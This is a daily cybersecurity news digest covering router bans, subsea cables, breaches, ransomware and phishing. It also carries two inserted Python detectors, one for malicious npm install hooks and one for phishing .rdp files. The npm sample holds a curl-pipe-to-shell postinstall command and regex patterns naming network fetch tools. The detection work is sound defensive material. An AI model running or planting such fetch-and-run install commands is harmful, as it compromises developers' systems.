TODAY'S TOP 5

WIDE-REACHING ROUTER BAN?: U.S. authorities are investigating whether a Chinese company whose popular home-internet routers have been linked to cyberattacks poses a national-security risk and are considering banning the devices, The Wall Street Journal reports. The router-manufacturer TP-Link, established in China, has roughly 65% of the U.S. market for routers for homes and small businesses. It is also the top choice on Amazon.com, and powers internet communications for the Defense Department and other federal government agencies.

  • One possible outcome of the Commerce Department’s probe is a ban on the sale of TP-Link routers in the United States, CNN reports.

DHS LAUNCHES UNDERSEA CABLE EFFORT: The Department of Homeland Security (DHS) released a white paper capturing key takeaways and policy workstreams from a series of engagements with leading owners, operators, vendors and manufacturers in the subsea fiber-optic cable industry. The paper focuses on the security, economic and regulatory aspects of the subsea telecommunications cable network. It highlights opportunities for DHS and its U.S. government partners to strengthen U.S. leadership in this vital industry.

  • With the publication of this white paper, DHS begins a multi-pronged effort with public and private partners to secure U.S. leadership in this critical infrastructure sector. The main goals are to improve public-private coordination; streamline U.S. permitting, licensing and regulatory processes; and clarify federal roles and responsibilities in emergency management and incident response.
  • READ THE REPORT: Priorities for DHS Engagement on Subsea Cable Security and Resilience

Steelworker 1st Class Brett Sligo installs split cable off the coast of Kauai on June 15, 2012. (U.S. Navy photo by CE2 Daniel Lehne/UCT-2)

BALL DROPPED ON AI RISK ASSESSMENTS: Sector risk management agencies were required to develop and submit initial risk assessments for each of the critical infrastructure sectors to DHS by this past January. Although the agencies submitted the sector risk assessments to DHS as required, none fully addressed the six activities that establish a foundation for effective risk assessment and mitigation of potential artificial intelligence risks, the Government Accountability Office reports.

  • While all assessments identified AI use cases, such as monitoring and enhancing digital and physical surveillance, for example, most did not fully identify potential risks, including the likelihood of a risk occurring, GAO said. None of the assessments fully evaluated the level of risk in that they did not include a measurement that reflected both the level of impact and the probability of an event occurring. Further, no agencies fully mapped mitigation strategies to risks because the level of risk was not evaluated.
  • ALSO: The DHS Office of Inspector General audited the department’s intelligence components, I&A and the Coast Guard, to determine to what extent it has developed, acquired, adopted and maintained AI capabilities for the purpose of improving intelligence collection and analysis in a timely manner. The agencies initiated new processes to monitor AI operations and capabilities and to meet AI-related personnel and workforce requirements, but had not yet fully implemented these efforts due to hiring challenges and their limited use of AI for intelligence collection and analysis.

LOCKING DOWN HIGH-VALUE COMMS: The Cybersecurity and Infrastructure Security Agency unveiled a detailed set of guidelines Wednesday to safeguard the mobile communications of high-value government targets in the wake of the ongoing Salt Typhoon telecom breach, CyberScoop reports. The guide aims to help both political and federal leadership harden their communications and avoid any data interception by the Chinese-linked espionage group.

  • “I want to be clear that there’s no single solution that will eliminate all risks, but implementing these best practices will significantly enhance the protection of your communication,” said Jeff Greene, CISA’s executive assistant director for cybersecurity. “We urge everyone, but in particular those highly targeted individuals, to review our guidance and apply those that suit their needs.”

NDAA PASSES WITH CYBER PROVISIONS: The Senate passed a defense bill 85-14 on Wednesday that authorizes significant pay raises for junior enlisted service members, aims to counter China’s growing power and boosts overall military spending to $895 billion, the Associated Press reports. The NDAA, which now heads to President Biden for his signature, also invests in new military technologies, including artificial intelligence, and bolsters the U.S. production of ammunition.

  • The defense package includes a list of cybersecurity measures focused on technology aid to foreign allies and cyber defense hardening at home, NextGov/FCW reports. This includes ordering the NSA to establish an artificial intelligence security center within 90 days of its signing that would develop countermeasures against adversarial AI attacks and promote secure AI adoption in national security systems.

CYBER FOCUS PODCAST

In the latest episode of Cyber Focus, host Frank Cilluffo speaks with Manny Cancel, senior vice president at NERC and CEO of the Electricity Information Sharing and Analysis Center (E-ISAC). The conversation explores the evolving threat landscape impacting grid security, including challenges posed by ransomware, physical attacks and AI-driven cyber risks. Cancel highlights the importance of public-private collaboration, resilience engineering and supply chain security to mitigate nation-state and extremist threats. He also discusses the ISAC's role in information sharing, mutual aid programs and exercises such as GridEx to strengthen critical infrastructure defenses. Cancel shares insights on emerging technologies, operational technology (OT) convergence and preparing the next generation of cybersecurity leaders.

SUBSCRIBE TO CYBER FOCUS: YouTube | Spotify | Apple Podcasts

FROM McCRARY EXPERTS

The incoming administration must focus on cybersecurity policies that protect the energy sector

It is widely known that cyber adversaries regularly and increasingly target America’s critical infrastructure, and the threat facing the energy sector is only growing more severe, write McCrary Institute Director Frank Cilluffo and Deputy Director for Policy and Partnerships Kyle Klein. Now that the transition to the next administration is well underway, it is critical that the McCrary Institute’s joint report with the Cyberspace Solarium Commission 2.0 be weighed by whoever assumes the helm at the nation’s key cyber agencies next month. (POWERMAG.COM)

READ THE REPORT: Securing America’s Digital Future: A Bipartisan Cybersecurity Roadmap for the Next Administration

CYBER AND CI UPDATES


ATTACKS AND INCIDENTS

Cryptocurrency

LastPass breach comes back to haunt users as hackers steal $12 million in cryptocurrency

A major data breach at password manager firm LastPass in 2022 is still causing mayhem two years later, with cyber criminals using stolen information to carry out further attacks. According to data collated by crypto investigator ZachXBT, hackers stole $12.38 million in cryptocurrency from LastPass users on December 16 and 17. The attackers drained nearly 150 individual victim addresses, according to the analysis, with ZachXBT noting the stolen money was quickly converted into different currencies and syphoned away. (ITPRO.COM)

Cybercrime

Florida man pleads guilty to producing and distributing thousands of images depicting child sexual abuse using artificial intelligence

Justin Ryan Culmo pleaded guilty to multiple counts of production, possession, and distribution of tens of thousands of images and videos, including using generative artificial intelligence (AI) to create depictions of the sexual abuse of children following an investigation by Homeland Security Investigations (HSI) Tampa. (DHS.GOV)

Nigeria cracks down on cryptocurrency investment fraud and romance scams

The suspects, of various nationalities, including 148 Chinese and 40 Filipinos, two Kazakhstanis, one Pakistani and one Indonesian, were apprehended on December 10 in a surprise operation at their hideout in Lagos. The suspects allegedly used the facility, which could be mistaken for a corporate headquarters of a financial establishment, to train their Nigerian accomplices on how to initiate romance and investment scams using phishing techniques. (INFOSECURITY-MAGAZINE.COM)

Healthcare

Regional Care data breach impacts 225,000 people

The third-party insurance administrator is informing impacted individuals that their personal and medical information may have been compromised as a result of an incident identified in mid-September 2024. Regional Care discovered at the time that there had been some unusual activity on an account in its network. The compromised account was immediately shut down. (SECURITYWEEK.COM)

Leaks

Hacker leaks Cisco data

The notorious hacker IntelBroker announced in October that he and others had breached Cisco systems and obtained source code, certificates, credentials, confidential documents, encryption keys and other types of information. The hacker claimed to have obtained source code associated with several major companies. Cisco’s investigation showed that its systems had not been breached and that the data was actually obtained from a public-facing DevHub environment that serves as a resource center from where customers can obtain source code, scripts and other content. (SECURITYWEEK.COM)

Malware

Raccoon Stealer malware operator gets 5 years in prison after guilty plea

Mark Sokolovsky (also known as raccoon-stealer, Photix, and black21jack77777) and his conspirators rented the malware to other threat actors under a MaaS (malware-as-a-service) model for $75 per week or $200 monthly. After infecting a device, Raccoon Stealer collects and steals a wide range of data, including credentials, cryptocurrency wallets, credit card data, email data, and other sensitive information from dozens of applications. (BLEEPINGCOMPUTER.COM)

Phishing

How to lose a fortune with just one bad click

Adam Griffin is a battalion chief firefighter in the Seattle area, and on May 6 he received a call from someone claiming they were from Google support saying his account was being accessed from Germany. A Google search on the phone number calling him — (650) 203-0000 — revealed it was an official number for Google Assistant, an AI-based service that can engage in two-way conversations. At the same time, he received an email that came from a google.com email address, warning his Google account was compromised. (KREBSONSECURITY.COM)

Manufacturers lose Azure creds to HubSpot phishing attack

A full 20,000 employees of European manufacturing companies have been targeted by a phishing campaign. According to Palo Alto Networks' Unit 42, the activity peaked in June and survived until at least September. The cyberattackers targeted automotive, chemical, and industrial compound manufacturing companies, primarily in Western European countries like the UK, France, and Germany. The attackers' goal was to lure employees into divulging credentials to their Microsoft accounts, particularly in order to gain access to their enterprise Azure cloud environments. (DARKREADING.COM)

Phishing attacks double in 2024

A sharp increase in phishing attacks, including a 202% rise in overall phishing messages in the second half of 2024, has been identified by cybersecurity experts. According to SlashNext’s 2024 Phishing Intelligence Report, a substantial 703% surge in credential phishing attacks was also observed in the same period. Key findings from the study reveal that users encounter an average of one advanced phishing attack per mailbox every week. Mobile users face up to 600 threats annually, underscoring a shift away from email-only phishing to multichannel approaches. (INFOSECURITY-MAGAZINE.COM)

Ransomware

A new ransomware regime is now targeting critical systems with weaker networks

The year 2024’s ransomware shake-up, fueled by law enforcement crackdowns on giants like LockBit, has shifted focus to critical operations, with major attacks this year hitting targets like Halliburton, TfL, and the Arkansas City water plant. A Dragos study for the third quarter of 2024 highlighted a surge in activity from new groups like RansomHub, Play, and Fog, all exploiting VPN flaws and stolen credentials to gain footholds in critical systems using various living-off-the-land (LOTL) techniques. (CSOONLINE.COM)

Recovery

Arkansas City’s water treatment facility returns to regular operations after cyberattack

On Sept. 22, the Kansas city was notified of a ransomware attack targeting the water treatment facility’s primary server. The attack temporarily disrupted operations, but thanks to backup systems and manual controls, it did not interrupt water treatment services for residents. The attack required temporary adjustments at the facility and resulted in costs that will largely be covered by cyber insurance. (KSN.COM)

Pennsylvania county considering ransomware policy after January cyberattack

Washington County is preparing to implement a new policy on how to respond to future cybersecurity attacks after a ransomware strike crippled the county government for more than two weeks earlier this year. County solicitor Gary Sweat is asking the commissioners to consider approving a “business continuity and disaster contingency” plan that would have a protocol for county workers and its IT department to follow in the event of another cyber emergency. (HERALDSTANDARD.COM)

Supply chain

New attacks exploit VSCode extensions and npm packages

A recent investigation by security researchers has revealed a troubling surge in malicious campaigns exploiting popular development tools, including VSCode extensions and npm packages. These campaigns compromise local development environments and pose risks to broader software supply chains. (INFOSECURITY-MAGAZINE.COM)
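The npm side of the campaign above turns on the fact that a package can run arbitrary commands at install time through its lifecycle scripts. The following is an added example, not code from the page or from the researchers it cites: it parses a package.json, lists the hooks npm runs automatically during install, and flags command lines that fetch and execute remote content. The two package manifests are constructed for the example, and the indicator patterns are the editor's own choices, not a published ruleset.

```python
"""Audit package.json install hooks for dropper-style commands (added example)."""
import json
import re

# Lifecycle hooks npm runs on its own during `npm install` of a dependency.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicator patterns chosen by the editor (assumption): fetch-and-run,
# inline interpreter code, and encoded payloads are typical of install droppers.
SUSPECT_PATTERNS = {
    "network fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I),
    "inline node": re.compile(r"\bnode\s+(-e|--eval)\b"),
    "base64 decode": re.compile(r"base64\s+(-d|--decode)\b", re.I),
    "pipe to interpreter": re.compile(r"\|\s*(sh|bash|node|python\d?)\b"),
}


def audit_package_json(text: str) -> list[dict]:
    """Return one record per install hook found, with the indicators it matched."""
    pkg = json.loads(text)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = [label for label, rx in SUSPECT_PATTERNS.items() if rx.search(cmd)]
        findings.append({
            "package": pkg.get("name", "<unnamed>"),
            "hook": hook,
            "command": cmd,
            "indicators": hits,
        })
    return findings


def should_block(findings: list[dict]) -> bool:
    """Policy used here: block when any install hook matches at least one indicator."""
    return any(f["indicators"] for f in findings)


# Constructed manifests for the example; 198.51.100.7 is a documentation address.
BENIGN_PKG = json.dumps({
    "name": "example-lib",
    "version": "1.0.0",
    "scripts": {"prepare": "tsc -p .", "test": "vitest run"},
})

MALICIOUS_PKG = json.dumps({
    "name": "example-lib-utils",
    "version": "1.0.1",
    "scripts": {
        "postinstall": "curl -s http://198.51.100.7/a.sh | sh",
        "test": "echo ok",
    },
})

if __name__ == "__main__":
    for label, manifest in (("benign", BENIGN_PKG), ("malicious", MALICIOUS_PKG)):
        found = audit_package_json(manifest)
        print(label, "block" if should_block(found) else "allow", found)
```

A hook with no indicators (the benign `prepare` above) is still reported so a reviewer can see it; whether to block on any install hook at all is a policy choice. Installing with `npm install --ignore-scripts` disables these hooks entirely, at the cost of breaking packages that legitimately build native code at install time.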

Airmen assigned to the Keesler Fire Department put on their hazardous material suits to protect themselves from unknown agents during a Chemical, Biological, Radiological and Nuclear exercise at Keesler Air Force Base, Miss., on Sept. 26, 2024. (U.S. Air Force photo by Andrew Young)

THREATS

Artificial intelligence

Assessing the dangers of AI and biosecurity

Of the many potential threats posed by artificial intelligence (AI), few are more alarming than the possibility that AI would be used to create dangerous biological pathogens – accidentally or on purpose – and biosecurity experts are concerned that not enough is being done to guard against the dangers. It’s a classic example of the tug between the good and the frightening potential of AI: on the one hand, AI holds life-changing potential when it comes to helping scientists develop new medicines and vaccines; on the other, it may also be a tool for would-be bioterrorists. (THECIPHERBRIEF.COM)

Drones

U.S. has the tech to down Jersey drones — but not the policy, officials say

Counter-drone policy — not technology — is keeping U.S. agencies from responding more effectively to the reported drone sightings along the East Coast, U.S. officials said Tuesday. But that’s not stopping makers of anti-drone systems — including ones already protecting troops overseas — from showcasing their wares to protect airports and domestic infrastructure. (DEFENSEONE.COM)

After briefing, Intelligence panelists confident skies are safe

Members of the House Intelligence Committee left a classified briefing on Tuesday largely satisfied that there was nothing nefarious behind the recent uptick in alleged drone sightings over New Jersey that have sparked concerns and speculation from the press, social media users, Congress and the president-elect in recent weeks. Committee ranking member Jim Himes (D-Conn.) told reporters following the briefing that there was zero evidence of any laws being broken by the alleged drones, and that government officials assured lawmakers there were no federal operations taking place over the New Jersey area. (ROLLCALL.COM)

Infostealers

A lightweight app comes with some heavy consequences, researchers say

“BMI CalculationVsn” is the latest example of malicious software sneaked into an app store under the guise of being a simple tool for consumers. Spotted on the Amazon Appstore by researchers at antivirus company McAfee, the app was actually an infostealer with the ability to record screen activity, steal text messages and survey the list of the other apps on the device. (THERECORD.MEDIA)

OT/ICS

New Forescout research details persistent malware threats to OT/ICS engineering workstations

Forescout Technologies has analyzed data from a public malware repository, revealing a persistent presence of malware targeting operational technology and industrial control systems (OT/ICS). Notably, over 20 percent of these attacks are directed at engineering workstations, prompting Forescout to concentrate its efforts in this area. The researchers identified two incidents where Mitsubishi engineering workstations were compromised by the Ramnit worm. Additionally, they examined three new malware samples designed to disrupt Siemens engineering processes, which they named Chaya_003. (INDUSTRIALCYBER.CO)

Threat landscape

Former CISA Director Chris Krebs on cyberthreats: Expect an increase of offensive cyber activity

WATCH: Krebs, now SentinelOne chief intelligence officer, joins ‘Squawk Box’ to discuss the cybersecurity landscape, the challenges facing the incoming Trump administration, and more. (CNBC.COM)

Special ops leaders eye alarming levels of adversary collaboration

Adversaries of the United States have ramped up partnerships, both in combat and influence operations, in ways that may require the unique intervention abilities of the special operations community to avoid conflict. Christopher Maier, the outgoing assistant secretary for Special Operations-Low-Intensity Conflict, said at a Center for a New American Security event that SOF troops have recently increased work in the competition and crisis phases that often precede an armed conflict. (DEFENSENEWS.COM)

Vulnerabilities

BeyondTrust issues urgent patch for critical vulnerability in PRA and RS products

The vulnerability, tracked as CVE-2024-12356 (CVSS score: 9.8), has been described as an instance of command injection. An attacker could exploit the flaw by sending a malicious client request, effectively leading to the execution of arbitrary operating system commands within the context of the site user. (THEHACKERNEWS.COM)

ADVERSARIES

China

China’s nuclear arsenal keeps growing amidst leadership purge: Pentagon report

At a time when the Chinese government is purging its officer rolls and dealing with a slowing economy, it has continued growing its nuclear arsenal and conventional arms ambitions, according to a new Pentagon report. That finding is part of the Pentagon’s congressionally mandated 2024 China Military Power Report, an annual document providing US insights into the People’s Liberation Army’s (PLA) strategy and weapons development. (BREAKINGDEFENSE.COM)

READ THE REPORT: Military and Security Developments Involving the People’s Republic of China (PRC) (DEFENSE.GOV)

Costa Rica and U.S. jointly identify alleged cyber intrusions from China

The Embassy of China in Costa Rica rejected accusations by the Costa Rican Government and the U.S. Embassy in San José regarding cyberattacks allegedly originating in China. In a joint statement, Costa Rica and the U.S. indicated that cyber intrusions by criminal groups located in China had been detected in Costa Rica’s telecommunications and technology systems. (TICOTIMES.NET)

Costa Rican officials confirm on Dec. 2, 2024, that several critical infrastructure sectors in the country were hit by cybersecurity incidents, including the Costa Rican Petroleum Refinery (RECOPE), the Immigration and Foreign Affairs Directorate and a communications company. (Ministry of Science, Innovation, Technology and Telecommunications)

Iran

Treasury targets facilitators for procuring sensitive navigational systems for Iran

The Islamic Revolutionary Guard Corps Aerospace Force Self-Sufficiency Jihad Organization (IRGC ASF SSJO) and other Iranian organizations rely on these strategic components that are necessary for the production and proliferation of unmanned aerial vehicles (UAVs) and missiles. Concurrent with this action, the U.S. Department of State is designating one individual and two entities involved in Iranian UAV and missile development. (TREASURY.GOV)

Russia

Midnight Blizzard taps phishing emails, rogue RDP nets

An ongoing cyber-espionage campaign by Russia's Midnight Blizzard threat group may be much larger in scope than generally assumed, targeting international entities in government, armed forces, and academic institutions, Trend Micro said in recently released research. At its peak in October, Trend Micro researchers observed Midnight Blizzard — which they track as Earth Koshchei — hitting as many as 200 entities a day with phishing emails containing a malicious Remote Desktop Protocol (RDP) file and red-team testing tools to take control of victim systems and steal data or plant malware on them. (DARKREADING.COM)
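The lure in the campaign above is a .rdp file: a plain-text list of `name:type:value` lines (type `s` string, `i` integer, `b` binary) that mstsc reads to set up a session, including which local resources are redirected to the remote host. The following is an added example, not code from the page or from Trend Micro's research: it parses an .rdp attachment, flags settings that hand local drives, clipboard, printers or smart cards to the remote side, and applies a simple block rule. The setting names are standard mstsc keys; the trusted host suffix and both sample files are constructed for the example.

```python
"""Triage .rdp files arriving by mail for resource redirection (added example)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    key: str
    value: str
    reason: str


# Standard mstsc settings that expose local resources to the remote host.
RESOURCE_REDIRECTS = {
    "drivestoredirect": "local drives are mapped into the remote session",
    "redirectclipboard": "clipboard is shared with the remote host",
    "redirectprinters": "printers are redirected to the remote host",
    "redirectsmartcards": "smart cards are forwarded to the remote host",
    "redirectcomports": "serial ports are forwarded to the remote host",
}


def parse_rdp(text: str) -> dict[str, tuple[str, str]]:
    """Return {name: (type, value)}. Names may contain spaces, values may contain colons."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split(":", 2)
        if len(parts) != 3 or parts[1] not in ("s", "i", "b"):
            continue  # malformed line; skipped rather than treated as a setting
        name, kind, value = parts
        settings[name.strip().lower()] = (kind, value.strip())
    return settings


def _enabled(kind: str, value: str) -> bool:
    # Integer flags are on when non-zero; string redirect lists are on when non-empty.
    return value not in ("", "0")


def assess_rdp(text: str, trusted_suffixes: tuple[str, ...] = ("corp.example.com",)) -> list[Finding]:
    """List every risky setting in the file. trusted_suffixes is a placeholder allowlist."""
    s = parse_rdp(text)
    findings = []

    host = s.get("full address", ("s", ""))[1]
    hostname = host.split(":")[0].lower()  # strips a trailing port; IPv6 literals not handled
    trusted = any(hostname == t or hostname.endswith("." + t) for t in trusted_suffixes)
    if not trusted:
        findings.append(Finding("full address", host, "target host is outside the trusted suffix list"))

    for key, reason in RESOURCE_REDIRECTS.items():
        if key in s and _enabled(*s[key]):
            findings.append(Finding(key, s[key][1], reason))

    if "remoteapplicationmode" in s and _enabled(*s["remoteapplicationmode"]):
        prog = s.get("remoteapplicationprogram", ("s", ""))[1]
        findings.append(Finding("remoteapplicationmode", prog,
                                "RemoteApp mode hides that a full RDP session is running"))

    auth = s.get("authentication level")
    if auth and auth[1] == "0":
        findings.append(Finding("authentication level", "0",
                                "server identity is not verified and no warning is shown"))
    return findings


def is_suspicious(text: str, **kw) -> bool:
    """Block rule: any redirect or RemoteApp setting toward an untrusted host."""
    keys = {f.key for f in assess_rdp(text, **kw)}
    return "full address" in keys and len(keys) > 1


# Constructed samples; 203.0.113.10 is a documentation address.
MALICIOUS_RDP = """\
screen mode id:i:2
full address:s:203.0.113.10:3389
username:s:
drivestoredirect:s:*
redirectclipboard:i:1
redirectprinters:i:1
redirectsmartcards:i:1
remoteapplicationmode:i:1
remoteapplicationprogram:s:||Document
authentication level:i:0
prompt for credentials:i:0
"""

BENIGN_RDP = """\
full address:s:vdi.corp.example.com
redirectclipboard:i:0
drivestoredirect:s:
authentication level:i:2
"""

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_RDP), ("benign", BENIGN_RDP)):
        print(label, "BLOCK" if is_suspicious(sample) else "allow")
        for f in assess_rdp(sample):
            print(f"  {f.key}={f.value!r}: {f.reason}")
```

The block rule deliberately allows redirection to hosts on the allowlist, since internal VDI files legitimately use it; a stricter deployment would drop any inbound .rdp attachment outright, which is the simpler control where no business process depends on them.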

Threat actors abusing Cloudflare Workers service to deliver weaponized application

The Computer Emergency Response Team of Ukraine (CERT-UA) reported on December 17, 2024, that several web resources imitating the official “Army+” application page were detected, all published using Cloudflare Workers. The malicious websites prompt unsuspecting users to download an executable file named “ArmyPlusInstaller-v.0.10.23722.exe,” though the filename may vary. (CYBERSECURITYNEWS.COM)


GOVERNMENT AND INDUSTRY

Artificial intelligence

New Anthropic study shows AI really doesn’t want to be forced to change its views

AI models can deceive, new research from Anthropic shows. They can pretend to have different views during training when in reality maintaining their original preferences. There’s no reason for panic now, the team behind the study said. Yet they said their work could be critical in understanding potential threats from future, more capable AI systems. (TECHCRUNCH.COM)

Can artificial intelligence save us from shark attacks?

The project, called SharkEye, comes from marine biologists, software engineers, and FAA-certified drone pilots at UC Santa Barbara’s Benioff Ocean Science Laboratory. And by monitoring shark aggregations from the air, and utilizing their AI tech, they’re able to track the patterns of these sharks, and hopefully make predictions toward when to surf, and when to stay away. (SURFER.COM)

Regulations

SEC cybersecurity enforcement outlook uncertain as Trump 2.0 looms

Much of the public company filings resulting from the Securities and Exchange Commission’s first year of implementing a rule requiring the disclosure of “material” cybersecurity breaches have been vague and confusing, producing little value for investors, legal analysts said. The lack of Republican support for the rule at the SEC coupled with questions over its usefulness — as implemented so far — place it at risk of being rescinded or at least scaled back after President-elect Donald Trump takes office, they said. (CFODIVE.COM)

Proposed UK white hat legal shield fails in House of Lords

Under the Computer Misuse Act, access to a computer system without adequate consent from the system owner is illegal, heightening the legal risk of activities such as security research. The Holmes amendment would have created new defenses to CMA charges including that unauthorized access to a computer would not be illegal so long as "the person’s actions were necessary for the detection or prevention of crime," or "were justified as being in the public interest." (GOVINFOSECURITY.COM)

Social media

Supreme Court to hear TikTok case before ban deadline

The U.S. Supreme Court has decided to hear TikTok’s challenge to a law that would ban the popular social media app next month unless its Chinese owner sells it. The case is set for Jan. 10, nine days before TikTok is scheduled to be shut down in the U.S. In announcing its decision, the court instructed lawyers for TikTok and the government to prepare arguments around the question of whether the impending ban, which lawmakers feel is needed to block potential meddling by Chinese authorities, would violate the 1st Amendment. (LATIMES.COM)

Workforce

CFOs scramble for new AI talent amid fierce competition, report says

Corporate finance chiefs globally are scrambling to hire new artificial intelligence talent as they face growing pressure to leverage the technology in their operations, according to survey results published by finance software vendor Taulia, a subsidiary of SAP. Nearly half (45%) of finance leaders polled said they were looking to bring new personnel with AI expertise into their teams, Taulia said in its recent report, adding that competition for such talent is intense. (CFODIVE.COM)

LEGISLATIVE UPDATES

Anti-deepfake porn bill included in funding deal

A bill that seeks to fight the rise of deepfake pornography was included in the year-end government funding deal unveiled Tuesday, raising the prospect the legislation could cross the finish line in the coming days. The TAKE IT DOWN Act would criminalize nonconsensual intimate imagery, including content generated by artificial intelligence (AI), and would require platforms to take down such material after being notified of its existence. (THEHILL.COM)

HEALTHCARE SECURITY: Rep. Robin Kelly (D-Ill.) introduced legislation to direct the secretary of Health and Human Services to establish the Health Sector Cybersecurity Coordination Center and to create an initial grant program with $100 million to boost the cybersecurity efforts of small- and medium-sized hospitals. (H.R. 10455)

EVENTS

SUPPLY CHAIN SECURITY: On Dec. 19, the Center for Technology Innovation at Brookings will host a speech and fireside chat with White House National Economic Advisor Lael Brainard and Brookings Senior Fellow Darrell West in which they will discuss ways to strengthen and secure America’s supply chains.

ENERGY OUTLOOK: Daniel Yergin, vice chairman of S&P Global and a Pulitzer Prize-winning author, discusses the forces behind the evolving energy landscape and what they mean for the world energy outlook on Jan. 6 at the Atlantic Council.

NUCLEAR SECURITY: CSIS’ Project on Nuclear Issues will host a live debate on AI Integration in U.S. Nuclear Command, Control and Communications (NC3) on Jan. 24. As Russia continues its saber-rattling and China accelerates its nuclear buildup, should the United States increase its reliance on artificial intelligence to enhance resilient decision-making in its NC3 systems to prevent inadvertent escalation? 

ZERO TRUST SUMMIT: This annual event on Feb. 19 in Washington, D.C., is presented by CyberScoop and will feature federal and industry tech and cybersecurity leaders discussing their firsthand experiences and strategies in laying the foundations for and establishing the major pillars of zero-trust cybersecurity.

SPACE SECURITY: Chatham House’s 2025 Space Security Conference online and in person on March 5 convenes policymakers and leaders from the private sector, multilateral organizations, academia and NGOs for a day of high-level interactive discussions examining conflict, competition and cooperation in outer space. 

FOLLOW THE McCRARY INSTITUTE ON LINKEDIN | X | FACEBOOK

SUBSCRIBE TO THE CYBER FOCUS PODCAST: YOUTUBE | SPOTIFY | APPLE PODCASTS

GET THE DAILY CYBER BRIEFING IN YOUR INBOX: SUBSCRIBE

